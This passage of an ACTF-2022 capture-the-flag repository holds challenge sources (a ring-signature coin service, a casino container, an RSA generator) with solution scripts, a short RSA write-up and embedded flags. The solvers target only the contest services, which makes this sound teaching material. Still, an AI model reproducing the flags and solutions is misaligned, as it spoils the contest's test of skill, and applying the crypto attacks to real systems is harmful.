remember the 1 token I lent you? 
Pay off that loan, now!", "0a0e7495d51cbd5ea045d1cbca47512ef25d5c6207b25f9d67ac0ccc160390020a50d6f4b88e86192a664d3220b84e53c9166d2c993ee1b6d2edbbdfef5461e5"] -------------------------------------------------------------------------------- /crypto/CryptoNote/src/solution_fake.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from secret import alice_priv, alice_pub, bob_priv, bob_pub, carol_pub 3 | from json import dumps 4 | from blockchain_service import BCTransaction 5 | from ring_signature import transaction_curve, serialize2json 6 | 7 | E, G = transaction_curve() 8 | 9 | rr = process(['python3', 'blockchain_service.py']) 10 | 11 | def submit_to_rpc_1(type_str, transaction=None): 12 | req = dict() 13 | req['type'] = type_str 14 | if transaction is not None: 15 | req['transaction'] = transaction 16 | json = dumps(req) 17 | rr.sendlineafter(b'req> ', json.encode()) 18 | recv = rr.recvuntil(b'\n').strip() 19 | return recv 20 | 21 | def generate_show_state(txi, pub): 22 | key_images = [] 23 | txos = [E(carol_pub), E(bob_pub), E(alice_pub), E(bob_pub), E(carol_pub)][:txi+1] 24 | pk_owned = dict() 25 | pk_owned[pub] = [txi] 26 | return serialize2json(pk_owned, txos, key_images) 27 | 28 | def transfer_to(txo_id, priv, pub): 29 | # transfer txo_id, priv to pub 30 | transaction = BCTransaction.generate(txo_id, pub, priv, generate_show_state(txo_id, priv * G)) 31 | return submit_to_rpc_1("new_transaction", transaction.serialize()) 32 | 33 | transfer_to(2, alice_priv, E(bob_pub)) 34 | print(transfer_to(3, bob_priv, E(carol_pub)).decode()) 35 | rr.interactive() 36 | rr.close() 37 | -------------------------------------------------------------------------------- /crypto/RSA_Leak/writeup_en.md: -------------------------------------------------------------------------------- 1 | Firstly, using a meet-in-the-middle attack (just brute force), we can easily recover rp and rq.
Here, rp and rq are about $2^{24}$, and we also know $n = (a^4 + rp) \cdot (b^4 + rq) = (ab)^4 + O(a^4)$. Based on this fact, we have $a*b=n^{1/4}$ up to rounding, since the remaining terms are small next to $(ab)^4$. Finally, using these two equations, we can solve for $a$ and $b$. Knowing $p$ and $q$ -> get flag~ -------------------------------------------------------------------------------- /crypto/casino/attachments/Dockerfile: -------------------------------------------------------------------------------- 1 | # sudo docker build -t aaacasino:latest . 2 | # sudo docker run -p 19991:19991 aaacasino:latest 3 | FROM ubuntu:20.04 4 | 5 | RUN apt-get -qq update && apt-get install -qq --no-install-recommends xinetd python3-pip 6 | RUN pip3 install pycryptodome 7 | RUN pip3 install qunetsim 8 | RUN apt-get install -qq --no-install-recommends netcat 9 | 10 | COPY main.py / 11 | COPY backend.py / 12 | COPY players.py / 13 | COPY casino.py / 14 | COPY secret.py / 15 | COPY service.conf / 16 | COPY wrapper / 17 | 18 | 19 | RUN chmod +x /main.py /backend.py /players.py /casino.py /secret.py 20 | RUN chmod +x /service.conf /wrapper 21 | 22 | EXPOSE 19991 23 | 24 | CMD ["/usr/sbin/xinetd", "-filelog", "/dev/stderr", "-dontfork", "-f", "/service.conf"] 25 | -------------------------------------------------------------------------------- /crypto/casino/attachments/backend.py: -------------------------------------------------------------------------------- 1 | from qunetsim import Network 2 | 3 | 4 | def exchange_key(aaa, tbd, qubits_n): 5 | network = Network.get_instance() 6 | nodes = [aaa.host.host_id, tbd.host.host_id] 7 | network.start(nodes) 8 | 9 | network.delay = 0.0 10 | 11 | network.add_host(aaa.host) 12 | network.add_host(tbd.host) 13 | 14 | t1 = aaa.host.run_protocol(aaa.exchange_key, (tbd.host.host_id, qubits_n*2)) 15 | t2 = tbd.host.run_protocol(tbd.exchange_key, (aaa.host.host_id, qubits_n*2)) 16 | t1.join() 17 | t2.join() 18 | 19 | return network 20 | 21 | 22 | def bet_in_casino(network, aaa, tbd, bet_times): 23 | t1 =
aaa.host.run_protocol(aaa.bet, (tbd.host.host_id, bet_times)) 24 | t2 = tbd.host.run_protocol(tbd.bet, (aaa.host.host_id, bet_times)) 25 | t1.join() 26 | t2.join() 27 | 28 | return network 29 | -------------------------------------------------------------------------------- /crypto/casino/attachments/casino.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | CASINO_DESCRIPTION = \ 4 | "==========================================================================\n" \ 5 | "| Hey gambler! Welcome to AAA casino, here you are going to bet with me.\n" \ 6 | "| Hope you can win a lot of money.\n" \ 7 | "| If you are outstanding enough, I will give you flag.\n" \ 8 | "==========================================================================\n" \ 9 | 10 | WIN_MSG = \ 11 | "Your gambling skills have been declared to be outstanding, here is the flag: " 12 | 13 | LOSE_MSG = \ 14 | "Go ahead, you can be better." -------------------------------------------------------------------------------- /crypto/casino/attachments/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | import signal 5 | import random, string, hashlib 6 | 7 | 8 | def proof_of_work(): 9 | proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)]) 10 | digest = hashlib.sha256(proof.encode()).hexdigest() 11 | print("sha256(XXXX+%s) == %s" % (proof[4:], digest)) 12 | x = input("Give me XXXX: ") 13 | if len(x)!=4 or hashlib.sha256((x+proof[4:]).encode()).hexdigest() != digest: 14 | print("Sorry~ bye~") 15 | return False 16 | print("Right!") 17 | return True 18 | 19 | 20 | def main(): 21 | from backend import bet_in_casino, exchange_key 22 | from players import AAA, GAMBLER 23 | from casino import CASINO_DESCRIPTION 24 | 25 | print(CASINO_DESCRIPTION) 26 | sys.stdout.flush() 27 | signal.alarm(300) 28 | 29 | aaa = AAA() 30 | gambler = GAMBLER() 31 | 32 | 
network = exchange_key(aaa, gambler, 128) 33 | if aaa.secret_iv != gambler.secret_iv: 34 | print("byebye~~") 35 | network.stop(True) 36 | return 37 | print("good job!") 38 | 39 | network = bet_in_casino(network, aaa, gambler, 256) 40 | network.stop(True) 41 | 42 | 43 | if __name__ == "__main__": 44 | if proof_of_work(): 45 | main() 46 | -------------------------------------------------------------------------------- /crypto/casino/attachments/secret.py: -------------------------------------------------------------------------------- 1 | 2 | flag = 'ACTF{this_is_a_local_flag-please_connect_to_the_remote_server_to_get_true_flag}' -------------------------------------------------------------------------------- /crypto/casino/attachments/service.conf: -------------------------------------------------------------------------------- 1 | service service 2 | { 3 | socket_type = stream 4 | protocol = tcp 5 | wait = no 6 | user = nobody 7 | bind = 0.0.0.0 8 | server = /wrapper 9 | port = 19991 10 | type = UNLISTED 11 | 12 | # If it makes sense to limit the CPU a single person can use: 13 | nice = 1 14 | # max number of "CPU seconds" (less than the wallclock timeout) 15 | # rlimit_cpu = 30 16 | # internal memory limit -- also see the k8s limit in info.yml 17 | # rlimit_as = 4000M 18 | rlimit_cpu = UNLIMITED 19 | rlimit_as = UNLIMITED 20 | rlimit_rss = UNLIMITED 21 | 22 | # Do not have more than X instances at the same time. 23 | # Note that the load balancer is NOT AWARE OF THIS, and so users (and the healthcheck) 24 | # will see failures. We have scripts to handle connection queues if useful, but 25 | # ideally this will never happen in production. POWs can be transparently required.
26 | instances = 128 27 | cps = 100 16 28 | # Cannot use: per_source (that's the load balancer) 29 | } -------------------------------------------------------------------------------- /crypto/casino/attachments/wrapper: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | /main.py -------------------------------------------------------------------------------- /crypto/impossibleRSA/attachments/flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/crypto/impossibleRSA/attachments/flag -------------------------------------------------------------------------------- /crypto/impossibleRSA/attachments/public.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQB+pWAiyLgiiDUmsUJs4sGi 3 | BJeEwLvitqUvBVtcgPEFK4vO4G6CNAd3JlN8zBqJRBVn1FRlcxGPPXuJgIjMOkyV 4 | G4vo3mLr/v/pER79JrPgP8E5hShao5rujsue8NUq9+r1dUsnqU3gEiPyZspAG+// 5 | 8P7TW0XcvCy5olRZqkV/QD6dlqjBaufWgTL2iMCtkadXT99ETmmgDVJ/GE51xErz 6 | pE8poKXjJqnwZEWEjdcqO1RXHKLAcmm3mpQEGbFOXWlb2cqSnKTbtJ0cVQ93y3gA 7 | mjCCBJrQLulx+5Oyn2+1rkRlHuMSq82DC0qAMvbc/DTjlTVYSC+GvIpEEFR344/5 8 | AgMBAAE= 9 | -----END PUBLIC KEY----- 10 | -------------------------------------------------------------------------------- /crypto/impossibleRSA/attachments/server.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | from Crypto.PublicKey import RSA 3 | 4 | e = 65537 5 | flag = b'ACTF{...}' 6 | 7 | while True: 8 | p = getPrime(1024) 9 | q = inverse(e, p) 10 | if not isPrime(q): 11 | continue 12 | n = p * q; 13 | public = RSA.construct((n, e)) 14 | with open("public.pem", "wb") as file: 15 | file.write(public.exportKey('PEM')) 16 | with open("flag", "wb") as file: 17 | 
file.write(long_to_bytes(pow(bytes_to_long(flag), e, n))) 18 | break 19 | -------------------------------------------------------------------------------- /crypto/retros/attachments/retros: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/crypto/retros/attachments/retros -------------------------------------------------------------------------------- /crypto/secure_connection/attachments/client.py: -------------------------------------------------------------------------------- 1 | from socket import socket 2 | import socketserver 3 | import argparse 4 | from core import connection_engine, connection_handle_socket 5 | import socket 6 | 7 | 8 | def banner(): 9 | print(''' 10 | ___ ___ ___ _ _ _ __ ___ ___ ___ _ __ _ __ 11 | / __|/ _ \/ __| | | | '__/ _ \/ __/ _ \| '_ \| '_ \ 12 | \__ \ __/ (__| |_| | | | __/ (_| (_) | | | | | | | 13 | |___/\___|\___|\__,_|_| \___|\___\___/|_| |_|_| |_| 14 | 15 | CLIENT 16 | ''') 17 | 18 | 19 | if __name__ == "__main__": 20 | parser = argparse.ArgumentParser() 21 | parser.add_argument("-a", "--address", required=True, 22 | help="remote ip address") 23 | parser.add_argument( 24 | "-p", "--port", help="server running port", type=int, required=True) 25 | parser.add_argument("-d", "--dump", action="store_true", default=False, 26 | help="dump payload of packet") 27 | parser.add_argument("-e", "--encrypt", action="store_true", default=False, 28 | help="enable secure encrypted connection") 29 | args = parser.parse_args() 30 | 31 | HOST, PORT = args.address, args.port 32 | 33 | banner() 34 | 35 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | 37 | s.connect((HOST, PORT)) 38 | 39 | handler = connection_handle_socket(s, "master", args.dump) 40 | connection_engine(handler, "master", args.encrypt) 41 | -------------------------------------------------------------------------------- 
/crypto/secure_connection/exploits/client.py: -------------------------------------------------------------------------------- 1 | from socket import socket 2 | import socketserver 3 | import argparse 4 | from core import connection_engine, connection_handle_socket 5 | import socket 6 | 7 | 8 | def banner(): 9 | print(''' 10 | ___ ___ ___ _ _ _ __ ___ ___ ___ _ __ _ __ 11 | / __|/ _ \/ __| | | | '__/ _ \/ __/ _ \| '_ \| '_ \ 12 | \__ \ __/ (__| |_| | | | __/ (_| (_) | | | | | | | 13 | |___/\___|\___|\__,_|_| \___|\___\___/|_| |_|_| |_| 14 | 15 | CLIENT 16 | ''') 17 | 18 | 19 | if __name__ == "__main__": 20 | parser = argparse.ArgumentParser() 21 | parser.add_argument("-a", "--address", required=True, 22 | help="remote ip address") 23 | parser.add_argument( 24 | "-p", "--port", help="server running port", type=int, required=True) 25 | parser.add_argument("-d", "--dump", action="store_true", default=False, 26 | help="dump payload of packet") 27 | parser.add_argument("-e", "--encrypt", action="store_true", default=False, 28 | help="enable secure encrypted connection") 29 | args = parser.parse_args() 30 | 31 | HOST, PORT = args.address, args.port 32 | 33 | banner() 34 | 35 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | 37 | s.connect((HOST, PORT)) 38 | 39 | handler = connection_handle_socket(s, "master", args.dump) 40 | connection_engine(handler, "master", args.encrypt) 41 | -------------------------------------------------------------------------------- /crypto/secure_connection/exploits/packet.txt: -------------------------------------------------------------------------------- 1 | header 2 | flags: 1bit enc | 1bit more data | 6bit opcode 3 | length: 1 byte 4 | 5 | pdu 6 | ... 
7 | 8 | crc 9 | crc24 10 | 11 | opcode: 12 | 0 Dummy 13 | 1 Hello 14 | 2 SC Request 15 | 3 SC Response 16 | 4 Master Confirm 17 | 5 Slave Confirm 18 | 6 Master Random 19 | 7 Slave Random 20 | 8 Data Payload -------------------------------------------------------------------------------- /crypto/secure_connection/exploits/server.py: -------------------------------------------------------------------------------- 1 | import socketserver 2 | import argparse 3 | from core import connection_handle_request, connection_engine 4 | 5 | dump_or_not = False 6 | 7 | 8 | class MySecureHandler(socketserver.BaseRequestHandler): 9 | def handle(self): 10 | handler = connection_handle_request(self.request, "slave", dump_or_not) 11 | connection_engine(handler, "slave", True) 12 | 13 | 14 | def banner(): 15 | print(''' 16 | ___ ___ ___ _ _ _ __ ___ ___ ___ _ __ _ __ 17 | / __|/ _ \/ __| | | | '__/ _ \/ __/ _ \| '_ \| '_ \ 18 | \__ \ __/ (__| |_| | | | __/ (_| (_) | | | | | | | 19 | |___/\___|\___|\__,_|_| \___|\___\___/|_| |_|_| |_| 20 | 21 | SERVER 22 | ''') 23 | 24 | 25 | if __name__ == "__main__": 26 | parser = argparse.ArgumentParser() 27 | parser.add_argument( 28 | "-p", "--port", help="server running port", type=int, required=True) 29 | parser.add_argument("-d", "--dump", action="store_true", default=False, 30 | help="dump payload of packet") 31 | args = parser.parse_args() 32 | 33 | HOST, PORT = "0.0.0.0", args.port 34 | 35 | dump_or_not = args.dump 36 | 37 | banner() 38 | 39 | with socketserver.TCPServer((HOST, PORT), MySecureHandler) as server: 40 | # Activate the server; this will keep running until you 41 | # interrupt the program with Ctrl-C 42 | server.serve_forever() 43 | -------------------------------------------------------------------------------- /logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/logo.png 
-------------------------------------------------------------------------------- /misc/Broken_QRCode/README.md: -------------------------------------------------------------------------------- 1 | # Broken QRCode 2 | 3 | - uuid AA8F922E-7A7C-886E-F54C-E82D73F614D8 找到图片是第一层题目 4 | - 题目.png 是第二层题目 5 | - qrcodes 文件夹中的 12 个二维码是第三层题目 6 | 7 | 完整 writeup 在 https://blog.tonycrane.cc/p/12a2afd2.html -------------------------------------------------------------------------------- /misc/Broken_QRCode/generate.py: -------------------------------------------------------------------------------- 1 | from qrcode import * 2 | 3 | rick = [ 4 | "We're no strangers to love", 5 | "You know the rules and so do I", 6 | "A full commitment's what I'm thinking of", 7 | "You wouldn't get this from any other guy", 8 | "I just wanna tell you how I'm feeling", 9 | "Gotta make you understand", 10 | "Never gonna give you up", 11 | "Never gonna let you down", 12 | "Never gonna run around and desert you", 13 | "Never gonna make you cry", 14 | "Never gonna say goodbye", 15 | "Never gonna tell a lie and hurt you", 16 | ] 17 | 18 | for i, each in enumerate(rick): 19 | qr = QRCode( 20 | version=5, 21 | error_correction=ERROR_CORRECT_H, 22 | ) 23 | qr.add_data(each) 24 | qr.make_image().save(f"qrs/{i}.png") 25 | 26 | 27 | part2 = "0100000100000011000101001100011110010101111101101011011011100011000001110111010111110101000101010010010000110110111101100100001100110111110100001110110000011000011111000010001010011100010011010100101001000100" # 1Ly_kn0w_QRCod3} 28 | hex_value = "" 29 | 30 | for i in range(0, len(part2), 8): 31 | part = part2[i:i+8] 32 | hex_value += f"{hex(int(part, 2))[2:]:>02}" 33 | 34 | print(hex_value) 35 | # 410314c795f6b6e30775f5152436f64337d0ec187c229c4d4a44 -------------------------------------------------------------------------------- /misc/Broken_QRCode/origin.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/origin.png -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/0.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/1.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/10.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/10.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/11.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/11.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/2.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/3.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/3.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/4.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/5.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/6.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/7.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/8.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/9.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/9.jpg
--------------------------------------------------------------------------------
/misc/Broken_QRCode/solver.py:
--------------------------------------------------------------------------------
# Diffs each damaged QR image in qrcodes/ against a freshly generated reference
# code for the same text, and writes the per-pixel difference to diff/.
from qrcode import *
from PIL import Image, ImageOps, ImageChops

# Text encoded in the twelve QR codes, in file order (qrcodes/0.jpg .. 11.jpg).
rick = [
    "We're no strangers to love",
    "You know the rules and so do I",
    "A full commitment's what I'm thinking of",
    "You wouldn't get this from any other guy",
    "I just wanna tell you how I'm feeling",
    "Gotta make you understand",
    "Never gonna give you up",
    "Never gonna let you down",
    "Never gonna run around and desert you",
    "Never gonna make you cry",
    "Never gonna say goodbye",
    "Never gonna tell a lie and hurt you",
]


def _trim_to_content(img):
    """Crop img to the bounding box of everything that is not pure white."""
    # getbbox() bounds the non-zero pixels, so invert first to make white zero.
    return img.crop(ImageOps.invert(img).getbbox())


for i, content in enumerate(rick):
    damaged = _trim_to_content(Image.open(f"qrcodes/{i}.jpg").convert("RGB"))
    reference = make(content, version=5, error_correction=ERROR_CORRECT_H).convert("RGB")
    # Scale the reference to the damaged image so the two can be compared pixel by pixel.
    reference = _trim_to_content(reference).resize(damaged.size)
    ImageChops.difference(damaged, reference).save(f"diff/{i}.jpg")
--------------------------------------------------------------------------------
/misc/Broken_QRCode/题目.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/题目.png
--------------------------------------------------------------------------------
/misc/FFSK/attachments/modem.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/FFSK/attachments/modem.wav
-------------------------------------------------------------------------------- /misc/FFSK/exploits/goertzel.py: -------------------------------------------------------------------------------- 1 | """ 2 | Module to create a Goertzel filter 3 | Original source: https://github.com/laurenschneider/audiodecoder 4 | """ 5 | 6 | import numpy as np 7 | 8 | class Goertzel(): 9 | 10 | def __init__(self, rate, freq): 11 | self.normalize = 0 12 | self.coeffs = 0 13 | self.sample_rate = rate 14 | self.target_freq = freq 15 | 16 | 17 | def calculate_coeff(self): 18 | """ 19 | Precompute coefficients needed for filter equation. 20 | Coeff formulas courtesy of Prof. Massey 21 | """ 22 | n = 160 23 | 24 | w0 = (2 * np.pi * self.target_freq) / self.sample_rate 25 | self.normalize = np.exp(1j * w0 * n) 26 | self.coeffs = np.array([np.exp((-1j) * w0 * k) for k in range(n)]) 27 | 28 | def filter(self, samples): 29 | """ 30 | Goertzel filter equation 31 | :param samples: array of samples 32 | :returns: amplitude 33 | """ 34 | y = self.normalize * 160 * np.dot(self.coeffs, samples) 35 | ampl = np.abs(y) 36 | 37 | return ampl 38 | -------------------------------------------------------------------------------- /misc/Man_in_Middle/exploits/key.py: -------------------------------------------------------------------------------- 1 | from hashlib import md5 2 | 3 | def GenerateTK(ANonce:int,CNonce:int): 4 | MasterKey = b'Master33y' 5 | return md5(MasterKey+ANonce.to_bytes(4,'little')+CNonce.to_bytes(4,'little')).digest() 6 | def GenerateKey(Nonce:int,TK:bytes)->bytes: 7 | MAC = b"0031c:29:c5122:90" 8 | IV = MAC + Nonce.to_bytes(4,'little') + TK 9 | key = md5(IV) 10 | return key.digest() -------------------------------------------------------------------------------- /misc/Man_in_Middle/exploits/secret.txt: -------------------------------------------------------------------------------- 1 | Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2 2 | We introduce the key reinstallation 
attack. This attack abuses design 3 | or implementation flaws in cryptographic protocols to reinstall an 4 | already-in-use key. This resets the key's associated parameters such 5 | as transmit nonces and receive replay counters. Several types of 6 | cryptographic Wi-Fi handshakes are affected by the attack. 7 | All protected Wi-Fi networks use the 4-way handshake to generate a fresh session key. So far, this 14-year-old handshake has 8 | remained free from attacks, and is even proven secure. However, 9 | we show that the 4-way handshake is vulnerable to a key reinstallation attack. Here, the adversary tricks a victim into reinstalling an 10 | already-in-use key. This is achieved by manipulating and replaying 11 | handshake messages. When reinstalling the key, associated parameters such as the incremental transmit packet number (nonce) and 12 | receive packet number (replay counter) are reset to their initial 13 | value. Our key reinstallation attack also breaks the PeerKey, group 14 | ACTF{Reinstallation-in-WPA2-,:)} 15 | key, and Fast BSS Transition (FT) handshake. The impact depends 16 | on the handshake being attacked, and the data-confidentiality protocol in use. Simplified, against AES-CCMP an adversary can replay 17 | and decrypt (but not forge) packets. This makes it possible to hijack 18 | TCP streams and inject malicious data into them. Against WPATKIP and GCMP the impact is catastrophic: packets can be replayed, 19 | decrypted, and forged. Because GCMP uses the same authentication 20 | key in both communication directions, it is especially affected. 21 | Finally, we confirmed our findings in practice, and found that 22 | every Wi-Fi device is vulnerable to some variant of our attacks. 
--------------------------------------------------------------------------------
/misc/Man_in_Middle/exploits/solve.py:
--------------------------------------------------------------------------------
# Narrows down, position by position, the 16-byte XOR key used for one group of
# ciphertexts in cipher.txt: a candidate key byte is kept only if it decrypts
# that position to a printable character in every ciphertext of the group.
#
# Defensive takeaway: the filtering only works because several messages are
# XORed with the same key bytes. A keystream (key + nonce pair) must never be
# reused across messages.
import base64
# NOTE(review): `base`, `group` and `pos` are not used anywhere below; they look
# like editor auto-imports, and `turtle` pulls in tkinter.
from email.mime import base
import json
from string import printable
from tokenize import group
from turtle import pos

with open('cipher.txt', 'r') as f:
    ciphers = json.load(f)


def xor(a, b):
    """XOR the first 16 bytes of a and b and return the 16-byte result."""
    return bytes(a[i] ^ b[i] for i in range(16))


# for idx in ciphers:
idx = '0'

# One list of surviving key-byte candidates per key position.
key = [list(range(256)) for _ in range(16)]
for encoded in ciphers[idx]:
    raw = base64.b64decode(encoded)
    for col in range(16):
        key[col] = [k for k in key[col] if chr(k ^ raw[col]) in printable]
# NOTE(review): the listing lost its indentation; printing once, after all
# ciphertexts have been processed, is assumed here.
print([bytes(i) for i in key])


# Keys hard-coded by the author, indexed by group number.
real_key = [b'\x95\xfa\xbd\x9b\xc1\x80L\xcey\xc0I\xb9\xcc]\xa3\xbf', b'\xe7`@\x91g\xcaIla\x83\xf5\xdc\x83\xac\x9d\x03']
for encoded in ciphers[idx]:
    key = real_key[int(idx)]
    print(xor(key, base64.b64decode(encoded)))

# Disabled alternative that compares ciphertexts pairwise:
# def dec_one(m:dict,a,b):
#     c = xor(a,b)
#     for _ in range(16):
#         candidate = m[a][_]
#         for i in candidate:
#             flag = False
#             for j in m[b][_]:
#                 if(i^j==c[_]):
#                     flag = True
#                     break
#             if flag == False:
#                 m[a][_] = m[a][_].replace(bytes([i]),b'')

# m = {}
# for a in group0:
#     m[a] = [printable.encode()] * 16
# for a in group0:
#     for b in group0:
#         if a!=b:
#             dec_one(m,a,b)
# print(m[group0[0]])

--------------------------------------------------------------------------------
/misc/Signin/attachments/flag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Signin/attachments/flag
--------------------------------------------------------------------------------
/misc/Signin/exploits/compress.py:
--------------------------------------------------------------------------------
# Wraps the file `flag` in 16 layers of compression, picking the tool for each
# layer at random, and renames the result back to `flag` after every layer.
import os
import random

input_file = 'flag'
random_list = [
    'gzip',
    'xz',
    'bzip2',
    'lzma',
    'zstd'
]

# Same order as random_list: (file the tool leaves behind, shell command).
steps = [
    ('flag.gz', 'gzip flag'),
    ('flag.xz', 'xz flag'),
    ('flag.bz2', 'bzip2 flag'),
    ('flag.lzma', 'lzma flag'),
    ('flag.zst', 'zstd -f flag'),
]

random_choices = [random.randint(0, len(random_list) - 1) for _ in range(16)]

for choice in random_choices:
    out_file, cmd = steps[choice]
    # Exit statuses are not checked: a missing tool goes unnoticed here.
    os.system(cmd)
    os.system('mv {} {}'.format(out_file, input_file))

print("done")
print("choices:", random_choices)
# choices: [2, 3, 3, 3, 1, 2, 1, 1, 1, 2, 0, 1, 2, 3, 3, 4]
--------------------------------------------------------------------------------
/misc/Signin/exploits/decompress.py:
--------------------------------------------------------------------------------
# Peels compression layers off the file `flag` until `file` no longer reports
# one of the five known formats.
#
# NOTE(review): the loop has no cap on nesting depth or on expanded size. That
# is fine for this known 16-layer file; add both limits before running it on
# untrusted input. The shell commands are built from the constant `input_file`;
# if that ever becomes caller-supplied, pass an argument list to subprocess
# instead of a formatted shell string.
import os
import random
import subprocess

input_file = 'flag'

# (substring of `file` output, format name), checked in this order.
signatures = [
    ('gzip compressed data', 'gzip'),
    ('XZ compressed data', 'xz'),
    ('bzip2 compressed data', 'bzip2'),
    ('LZMA compressed data', 'lzma'),
    ('Zstandard compressed data', 'zstd'),
]

# format name -> (suffix the tool expects, decompression command)
unpackers = {
    "gzip": (".gz", "gunzip"),
    "xz": (".xz", "unxz"),
    "bzip2": (".bz2", "bunzip2"),
    "lzma": (".lzma", "unlzma"),
    "zstd": (".zst", "unzstd --force"),
}


def get_compressed_type(filepath: str) -> str:
    """Return the compression format `file` reports for filepath, or '' if none matches."""
    # use file command
    result = subprocess.run(['file', filepath], stdout=subprocess.PIPE)
    file_cmd_output = result.stdout.decode().strip()
    for marker, name in signatures:
        if marker in file_cmd_output:
            return name
    return ''


while True:
    ctype = get_compressed_type(input_file)
    if ctype not in unpackers:
        print("done")
        break
    suffix, tool = unpackers[ctype]
    # The tools pick the output name from the suffix, so rename before unpacking.
    tmp_file = input_file + suffix
    cmd = "mv {} {}; {} {}".format(input_file, tmp_file, tool, tmp_file)
    os.system(cmd)
--------------------------------------------------------------------------------
/misc/Weird_rev/attachment.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Weird_rev/attachment.tar.gz
--------------------------------------------------------------------------------
/misc/탕쿠쿠의유혹/attachments/6cv_large.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/탕쿠쿠의유혹/attachments/6cv_large.zip
--------------------------------------------------------------------------------
/misc/탕쿠쿠의유혹/wp/broken.webp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/탕쿠쿠의유혹/wp/broken.webp
--------------------------------------------------------------------------------
/misc/탕쿠쿠의유혹/wp/diff.jpg:
--------------------------------------------------------------------------------
